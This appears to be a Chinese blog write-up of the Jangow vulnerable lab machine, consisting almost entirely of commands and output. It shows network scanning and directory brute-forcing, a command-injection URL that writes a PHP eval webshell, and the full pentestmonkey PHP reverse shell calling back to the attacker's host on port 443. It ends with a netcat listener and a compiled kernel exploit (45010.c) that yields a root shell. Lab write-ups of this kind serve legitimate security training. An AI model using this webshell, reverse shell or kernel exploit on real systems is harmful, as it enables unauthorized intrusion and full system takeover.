Jangow

最新推荐文章于 2023-02-26 16:37:41 发布

N1etzsche

最新推荐文章于 2023-02-26 16:37:41 发布

阅读量620

点赞数

文章标签： python web安全 html

本文链接：https://blog.csdn.net/Forever_Han13/article/details/123924023

版权

$ sudo nmap -sP 192.168.0.1/24

Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-04-02 15:07 CST
Nmap scan report for 192.168.0.1
Host is up (0.00042s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.101
Host is up (0.055s latency).
MAC Address: 62:95:C5:46:4A:54 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.17s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.19s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.107
Host is up (0.20s latency).
MAC Address: 50:01:D9:DA:FA:DD (Huawei Technologies)
Nmap scan report for 192.168.0.109
Host is up (0.0016s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.110
Host is up (0.00017s latency).
MAC Address: 08:00:27:09:9C:9F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 3.37 seconds

$ sudo nmap -sV -sC -A 192.168.0.110

Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-04-02 15:07 CST
Nmap scan report for 192.168.0.110
Host is up (0.00029s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:09:9C:9F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.0.110

OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds

 python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.110  -t 40 --exclude-status 403,401,429

  _|._ __  __ _|_    v0.4.2.3
 (_|||_) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40 | Wordlist size: 10780

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.110_22-04-02_15-12-37.txt

Target: <http://192.168.0.110/>

[15:12:43] Starting:
[15:12:43] 200 -  336B  - /.backup
[15:13:03] 301 -  313B  - /site  ->  <http://192.168.0.110/site/>
[15:13:03] 200 -   10KB - /site/

http://192.168.0.110/site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%27a%27])%20?%3E%27%20%3E%20hack.php

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.0.104';
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
 $pid = pcntl_fork();
 
 if ($pid == -1) {
  printit("ERROR: Can't fork");
  exit(1);
 }
 
 if ($pid) {
  exit(0);  // Parent exits
 }
 if (posix_setsid() == -1) {
  printit("Error: Can't setsid()");
  exit(1);
 }

 $daemon = 1;
} else {
 printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
 printit("$errstr ($errno)");
 exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
 printit("ERROR: Can't spawn shell");
 exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
 if (feof($sock)) {
  printit("ERROR: Shell connection terminated");
  break;
 }

 if (feof($pipes[1])) {
  printit("ERROR: Shell process terminated");
  break;
 }

 $read_a = array($sock, $pipes[1], $pipes[2]);
 $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

 if (in_array($sock, $read_a)) {
  if ($debug) printit("SOCK READ");
  $input = fread($sock, $chunk_size);
  if ($debug) printit("SOCK: $input");
  fwrite($pipes[0], $input);
 }

 if (in_array($pipes[1], $read_a)) {
  if ($debug) printit("STDOUT READ");
  $input = fread($pipes[1], $chunk_size);
  if ($debug) printit("STDOUT: $input");
  fwrite($sock, $input);
 }

 if (in_array($pipes[2], $read_a)) {
  if ($debug) printit("STDERR READ");
  $input = fread($pipes[2], $chunk_size);
  if ($debug) printit("STDERR: $input");
  fwrite($sock, $input);
 }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
 if (!$daemon) {
  print "$string\n";
 }
}

?>

sudo nc -lvnp 443

listening on [any] 443 ...
connect to [192.168.0.104] from (UNKNOWN) [192.168.0.110] 34204
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 13:05:30 up 59 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@jangow01:/$ uname -a

Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

www-data@jangow01:/$ lsb_release -a

lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial

www-data@jangow01:/$ lsb_release -a

lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial

www-data@jangow01:/$ cd /var/www/html/site

www-data@jangow01:/var/www/html/site$ ls

45010.c  busque.php  hack.php index.html  wordpress
assets  css      hack1.php js

www-data@jangow01:/var/www/html/site$ chmod +x 45010.c

www-data@jangow01:/var/www/html/site$ gcc 45010.c

www-data@jangow01:/var/www/html/site$ ./a.out

[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   **This vulnerability cannot be exploited at all on authentic grsecurity kernel**
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035959c00
[*] Leaking sock struct from ffff8800381252c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003ad06e40
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff88003ad06e40
[*] credentials patched, launching shell...

# cd /root

cd /root

# ls

ls
proof.txt

# cat proof.txt

cat proof.txt
                       @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
                       @  @@@@@@@@@@@@@@@&#   #@@@@@@@@&(.    /&@@@@@@@@@@
                       @  @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@&   .&@@@@@
                       @  @@@@@@@&  @@@@@@&@@@@@&%######%&@*./@@*   &@@
                       @  @@@@@*(@@@@@@@@@#/.               .*@.  .#&.   &@@@&&
                       @  @@@, /@@@@@@@@#,                       .@.  ,&,   @@&&
                       @  @&  @@@@@@@@#.         @@@,@@@/           %.  #,   %@&
                       @@@#  @@@@@@@@/         .@@@@@@@@@@            *  .,    @@
                       @@&  @@@@@@@@*          @@@@@@@@@@@             ,        @
                       @&  .@@@@@@@(      @@@@@@@@@@@@@@@@@@@@@        *.       &@
@@/*@@@@@@@/           @@@@@@@@@@@#                      @@
                      @@   .@@@@@@@/          @@@@@@@@@@@@@              @#      @@
                      @@    @@@@@@@@.          @@@@@@@@@@@              @@(      @@
                       @&   .@@@@@@@@.         , @@@@@@@ *.@@@*(    .@
                       @@    ,@@@@@@@@,   @@@@@@@@@&*%@@@@@@@@@,    @@@@@(%&*   &@
                       @@&     @@@@@@@@@@@@@@@@@         (@@@@@@@@@@@@@@%@@/   &@
                       @ @&     ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%*   &@
                       @  @@.     .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%*    &@&
                       @  @@@&       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/     &@@&&
                       @  @@@@@@.        *%@@@@@@@@@@@@@@@@@@@@&#/.      &@@@@&&
                       @  @@@@@@@@&               JANGOW               &@@@
                       @  &&&&&&&&&@@@&     @@(&@ @. %.@ @@%@     &@@@&&&&
                                     &&&@@@@&%       &/    (&&@@@&&&
                                       (((((((((((((((((((((((((((((

da39a3ee5e6b4b0d3255bfef95601890afd80709

#

N1etzsche

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
Jangow

$ sudo nmap -sP 192.168.0.1/24Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-04-02 15:07 CSTNmap scan report for 192.168.0.1Host is up (0.00042s latency).MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)Nmap scan r
复制链接

扫一扫